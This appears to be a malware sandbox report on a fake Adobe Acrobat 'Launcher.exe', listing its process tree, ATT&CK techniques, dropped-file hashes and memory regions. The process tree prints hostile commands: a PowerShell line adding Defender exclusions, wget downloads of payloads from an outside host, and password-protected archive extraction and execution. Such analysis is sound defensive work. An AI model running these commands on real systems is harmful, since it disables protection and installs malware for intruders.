"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
2⤵
PID:4184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
2⤵
PID:4352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
2⤵
PID:916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
2⤵
PID:672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
2⤵
PID:4188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6320 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1372

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2996

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2020

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap18387:96:7zEvent16186
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Users\Admin\Downloads\Launcher.exe
"C:\Users\Admin\Downloads\Launcher.exe"
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5664

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
2⤵
- Executes dropped EXE
PID:1844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
4⤵
- Executes dropped EXE
PID:5364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5188

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:5512

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:5844

C:\Users\Admin\AppData\Roaming\services\plugin17337
C:\Users\Admin\AppData\Roaming\services\plugin17337
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 548
6⤵
- Program crash
PID:6024

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:4624

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:5200

C:\Users\Admin\AppData\Roaming\services\2plugin17719
C:\Users\Admin\AppData\Roaming\services\2plugin17719
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5968

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:1724

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
PID:5912

C:\Users\Admin\AppData\Roaming\services\3plugin8790
C:\Users\Admin\AppData\Roaming\services\3plugin8790
5⤵
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 724
6⤵
- Program crash
PID:5476

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:4960

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3428 -ip 3428
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5724 -ip 5724
1⤵
PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\5b87b68f-616d-49d9-9470-f2138c7d397a.tmp
Filesize
11KB

MD5
1f6f34c57b6d890a265f6d54df284598

SHA1
7c3453a731e6093a4511875ac343d70ec8094db1

SHA256
de9089ce682eb0d8b7ab822599386d58ad51c355641c3a7f08e3137f5c177a91

SHA512
f22737fd78f0aedc2534f61d8a6de7b6752dcf29265501a86f8b938ae19ced9c2fb8eb272aea2422cd7bebd81f260d49249e9334ae4409b167b7b119c7ef0e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
12b71c4e45a845b5f29a54abb695e302

SHA1
8699ca2c717839c385f13fb26d111e57a9e61d6f

SHA256
c353020621fa6cea80eaa45215934d5f44f181ffa1a673cdb7880f20a4e898e0

SHA512
09f0d1a739102816c5a29106343d3b5bb54a31d67ddbfcfa21306b1a6d87eaa35a9a2f0358e56cc0f78be15eeb481a7cc2038ce54d552b9b791e7bee78145241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce319bd3ed3c89069337a6292042bbe0

SHA1
7e058bce90e1940293044abffe993adf67d8d888

SHA256
34070e3eea41c0e180cb5541de76cea15ef6f9e5c641e922d82a2d97bdce3aa3

SHA512
d42f7fc32a337ecd3a24bcbf6cd6155852646cae5fb499003356f713b791881fc2e46825c4ff61d09db2289f25c0992c10d6fadb560a9bea33284bd5acc449f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c
Filesize
160KB

MD5
14891dd1702a4b962f35d40529fccb8b

SHA1
c264b5978c929b3746872334078f5de84e00003d

SHA256
f2e89691c6cdb3b3abfa4e35484e97fc400e639002d9f785e3dc7af22fbe6ade

SHA512
aa057a291a369de12c85761e3651d7dfe644bbadae8ba878287e9e94ed9525dd5fc0ccc1e92637d7fbd47a697d087d83a5d9955d89e4b5f275ceafe2e68aee6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB

MD5
dfdd7b0a7f0c6d028e7f3ff2245260c5

SHA1
27f3f09ec7c3e400c2eae1cefa0e50a49018aa5b

SHA256
e8972ee317af68cafafb048cc337ee1ff6e845ab16c8306a3ac0b66a4e4b1c20

SHA512
1d84aec60181d2fea3058ec910cb9bfa9b566e882943b84cdf1ec743b148d08c532b15c4436850f4befb35373cacbee49b9d281c075851eeecc8fe985acb5574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
1KB

MD5
0e013bc902f6580ae8a565eb507f1807

SHA1
207e6606ebe9aa4c015d07e8a9c3032c709903dc

SHA256
ed1f377c7363a7048e34fb308a54c94b2cc8c3158bc7069eb151d0f0c881da3c

SHA512
ced0aa23bb337b25531016dff86b478fe79f44839ec96628f3c217ce832fc2e0bd6c55475ddbf1907d4564d3fcf0c8c359ea0ed27909427661b42f2c0f66f8e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
9d8c0c4ffea447d6eb145b750dd4dcc8

SHA1
63cf2b672535e70642537f8b5ac0d357a0aa402a

SHA256
866fb91ee3f6384630e0fc563c85eafb268d6014d45d72d61fd6839d5185d3b7

SHA512
e7a22572fbda864405d6505259b2541d548421eab78e8be68e971639420ab760aad54a0f30496532dffb3ca3ae0387fcdbd0dbf6874eb2b13e910b9473f2e4a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
5a2e4b11371f16d0fd1bd3d564aac5c9

SHA1
b11ed6016659af0e9a2ef59c1036dad52e3ef713

SHA256
2dce39bd832271c0b209965f4f56a6ea4a20717cfe3c549a3cb56c72ff50c266

SHA512
c6dccc7694b68409dcf822f276955ac8f3e99afe82d015620ef37a474dbfb111c14d996c397f622988d72e9601e4600cad406bff679d810514292df216700509

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
3a2f03c002442bf7cb00989eb7bc7e43

SHA1
3634d0ed72301cbf52799b220e54f3f9b9771aea

SHA256
cb124a1158f9fb30b56d8b7d79fd77eee23bb4ecab1398e5c1cf2e37e440906e

SHA512
ee831b9fd6fcd5f9b71682edf5287fd3d26df042bee9b95eb49932fea1ae78546c8f203c56251b7aae8721f8e68f4165f413bae8f1e160ac3cc3e3a9ea6d019b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
82fd4efb5254bd0d94e81a28d16fd022

SHA1
ad5b6693a6af2ddcadf1674bb09a3579612ea67a

SHA256
97cd2a4c1dbaff94a1917629fe4a03ec1ea00fef088af0877037bfdabf7da474

SHA512
fc49a3d851ca43d14279fc6b95efb4237617c99effff4656be06fa8da9ad6e0f772474c1da094b4eaa2abc6bf9cdc90ac79b2d7a663203a3677c29d553c900cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57ceba.TMP
Filesize
1KB

MD5
55ebb2203b878cc18b430877ce2b5164

SHA1
af82f7289e070c8f1beb896b9e510c1679b67e2c

SHA256
e3b93f27d858fb40d3fea297cc7a5ec787f5cd5765d0f6d296875fe855d6ab42

SHA512
eec929b7c2bdabb6aa9709b414804688fc9541f90ec336ccf6bd0295de0b065fcb0a875311f405ab909f5876cf05d2404e7be9fd6d3abfad1e6ce290330a7b1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
4571f0acefae0b6bffc18db795feb039

SHA1
c6f2e1b927b2cec77b3eb46d449fa58b2b1ab3db

SHA256
93a78884cadbaa4aaeafee0f265880cb482655aed21f4dfbcc3a2f4de139900e

SHA512
4aaa2d973137cd0aca4d669f992aa53fd7dd0160bfd5f1563f842fef483859f5bac8d1f985343b1128c05abd42e2b5d30214c842f647c16624a458bdc0a177a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
94908a6f04d43f8ba6ccebe2aca2914c

SHA1
60204b576087c1efe0a7bbba279e9e3099b3eb15

SHA256
5b068dc8d9805b4d8570443a2be4ea7906e262301debe1249525a15445f8e7cb

SHA512
93a7b90e39fa8ee81b63b273b592831012e5966594cff687051aa64989a223ae2bb47b1c6008406d9b909baf5783412f115b86c992e01692af1a65a2b3bf767a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvlyainb.x20.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
Filesize
12B

MD5
c4f0298e1c4ff60c22f2f9d02d6d78f6

SHA1
4dda71051633d09d213ab3c4524d51edac115ef3

SHA256
34d55bfbc53bcd55576653cb1c572d52416a871109272aaa9523cfc423ad17fe

SHA512
cd92e1244a76170d6a077ebb0a27a40194ed2bbfe5c739d08add4cf5c4780302b046c9487bbd0553afc3289a6c8567276ea602c30915347b47fec5e6913c9fc5

Download Submit
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
Filesize
184B

MD5
7675d808fceaa2c8b9988b4e2abd2730

SHA1
71226f98a19193465478c18c5dc4f3407480417b

SHA256
73ffd74fec20629c7a935aeb869adf18b01040c40a7f8f6f479b7de0518933bc

SHA512
8fd39fd4feb2a7499c30f9bb270fc6725948840bc9c65848e8107b68f98f9664dd703238162e6307a52463e241becd90d22be8cec074e3ca93cb084226246381

Download Submit
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
Filesize
184B

MD5
d4849916307c729057b6f28dcb3af681

SHA1
75b60d67ade0066091ac3eb53454231b207b4f40

SHA256
7ac344e62e52b086affce297c3aa66a87d31ccdf61e9fe3b40aa04923b5c6d70

SHA512
0e7d6f6fc85626294931984c6c0311a303c511affd57dba5bd8a6b99da66688caff7dafbb707f23aee7d16b72b6cb732f05cd955a14ab7baea7a5da7f41bf88c

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins5454.rar
Filesize
2.9MB

MD5
ba570128b7d838d5f8be2ab7dcff1581

SHA1
083104645dacee62d194a294ad5e0e1c45381315

SHA256
f2de45ce53d8949dd161a339824d5adb1279fbf07ef3dde52fd6d2eb2989da28

SHA512
b0e1ad7ea125d62d2124673562c0381869eb3793a5b6f5a97829b871acf6edb09035375ae867e529c703eccf4922fb870ebeab999bac87ca31f6e6845cfd59e5

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins17834.rar
Filesize
9.9MB

MD5
a475b9cfc8570a906c462c4b57a6be61

SHA1
600476b7999c84c4d46fdbacedaf1a8782d9dbd8

SHA256
39a7ac0b443dde996f1608aa90e88826547319e819dcc25fafe84e7880213f09

SHA512
00ad3374b028371f58d479e9d48050b760bcb85a9e508cacd824942dbd1b5ae3e6017836c50f0d2e136f6ff11d9cac5da23ab1ac6854e297f0b7076cd9e88810

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins10472.rar
Filesize
2.9MB

MD5
13b0bfeabc7ac2eb2d883f43f42f823e

SHA1
831f6ec0d2706a1678c889ce5549ce50adce2cc9

SHA256
b13c9acbb6da1b722ea35f8011791079bea0862f0c3a293cbe1e97ae245a3037

SHA512
456b3069d94e0ec73a755f87fa67885a082a27696a02c64e637cd0cc97bdfe96a2c9059fcb8c67f91ecc3c43dc1815b0808eb5742c72530fadcfb0f138719b60

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin17719
Filesize
7.5MB

MD5
2d2c4a2877f5fe158c64aa7efbecf444

SHA1
0695742880f3027430fc5839cb96d56b6ec6db54

SHA256
dfd2a5150b00205c332702a6ae3c85ff94b50525f48bdfd6a56a86c775c3a939

SHA512
8691506e299dbce3714782d3a84e4605ad1acd74660ffbf3a3ff14e81fd75f04d6416e71c3b09d28c4474bccee668d3e7f85731dfb9a0eb58e5904f4448a8055

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin8790
Filesize
375KB

MD5
9236019d60feb52b91baee880c9d67ce

SHA1
8a1a8e7238f101ebcbc1473b76e812e27207ffa1

SHA256
a88f063df600a9fc8704e4cfdf26541c0edc6d646acf46386cba191005efbc6d

SHA512
de3f711e02150baa1d8d40c556645b98b43b2d1d29fd265dbaeece56c88a1108ebc38ce788f75af95782b26da9f0c154190b20c54e0afac09df98f5e4ff4adf1

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin17337
Filesize
481KB

MD5
93c28b4f1fe4aa7767ea036564ac981e

SHA1
22e3ad3537e6833dd3926d8a301c690b6e2484a2

SHA256
a472e9c2807375d26f21b1cf916b55bee259cf68902b41b345a996d3981794e8

SHA512
c8826656eacac0c1d11d5f393c5ad1f50b6970b8468bf5e38184970de2efa41b9bce7e62272c214d3f2044621a19a180ab055752d48bec10c2f4d0a1e8aafcdb

Download Submit
C:\Users\Admin\Downloads\Adobe_Acrobat_Pro.zip
Filesize
237.4MB

MD5
a8b1914ca471f3967ff3532b6b8064b7

SHA1
b06cf23ab47f19c5a5bfb0883338d231939e39e1

SHA256
4d0422c5191c4fd6aec3b60c44a8b38dc838dc1e38626090fe0d4a010fa008f9

SHA512
020e11ff3bf2c89a2f57fd4578491c8967a4e2d4387f0263332c637011d6261893ae4676e23003237d8b4c7fd2db7a4260d76c8a570024d138b7227e20a2ff03

Download Submit
C:\Users\Admin\Downloads\Adobe_Acrobat_Pro.zip:Zone.Identifier
Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Launcher.dll
Filesize
2KB

MD5
32e7556ff4f5256d15e1fc843cee5e3d

SHA1
b7283061428e9ca741c26dcfc3e869e2fc699f0b

SHA256
b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278

SHA512
d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e

Download Submit
C:\Users\Admin\Downloads\Launcher.exe
Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\Downloads\Launcher.exe.manifest
Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\Launhcer.dll
Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\Launhcer.exe
Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\Launhcer.exe.manifest
Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\WinRAR.exe
Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\data\Launcher.dll
Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\Downloads\data\AppInfo\services\wget.exe
Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
\??\pipe\LOCAL\crashpad_3508_DNHIDOWTLFVWGXVA
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1724-5134-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2320-5101-0x0000000002DF0000-0x00000000031F0000-memory.dmp

Filesize
4.0MB

Download
memory/2320-5098-0x0000000001250000-0x0000000001259000-memory.dmp

Filesize
36KB

Download
memory/2320-5107-0x0000000002DF0000-0x00000000031F0000-memory.dmp

Filesize
4.0MB

Download
memory/2320-5108-0x00007FF9D8480000-0x00007FF9D8689000-memory.dmp

Filesize
2.0MB

Download
memory/2320-5100-0x0000000002DF0000-0x00000000031F0000-memory.dmp

Filesize
4.0MB

Download
memory/2320-5103-0x0000000002DF0000-0x00000000031F0000-memory.dmp

Filesize
4.0MB

Download
memory/2320-5106-0x00000000768C0000-0x0000000076B12000-memory.dmp

Filesize
2.3MB

Download
memory/2320-5105-0x00007FF9D8480000-0x00007FF9D8689000-memory.dmp

Filesize
2.0MB

Download
memory/2320-5102-0x00007FF9D8480000-0x00007FF9D8689000-memory.dmp

Filesize
2.0MB

Download
memory/3428-5109-0x0000000000400000-0x0000000000B21000-memory.dmp

Filesize
7.1MB

Download
memory/3428-5086-0x0000000000BC0000-0x0000000000CC0000-memory.dmp

Filesize
1024KB

Download
memory/3428-5110-0x0000000003CD0000-0x00000000040D0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-5097-0x00000000768C0000-0x0000000076B12000-memory.dmp

Filesize
2.3MB

Download
memory/3428-5095-0x0000000003CD0000-0x00000000040D0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-5094-0x00007FF9D8480000-0x00007FF9D8689000-memory.dmp

Filesize
2.0MB

Download
memory/3428-5093-0x0000000003CD0000-0x00000000040D0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-5092-0x0000000003CD0000-0x00000000040D0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-5091-0x0000000003CD0000-0x00000000040D0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-5088-0x0000000000400000-0x0000000000B21000-memory.dmp

Filesize
7.1MB

Download
memory/3428-5087-0x0000000000E90000-0x0000000000EEA000-memory.dmp

Filesize
360KB

Download
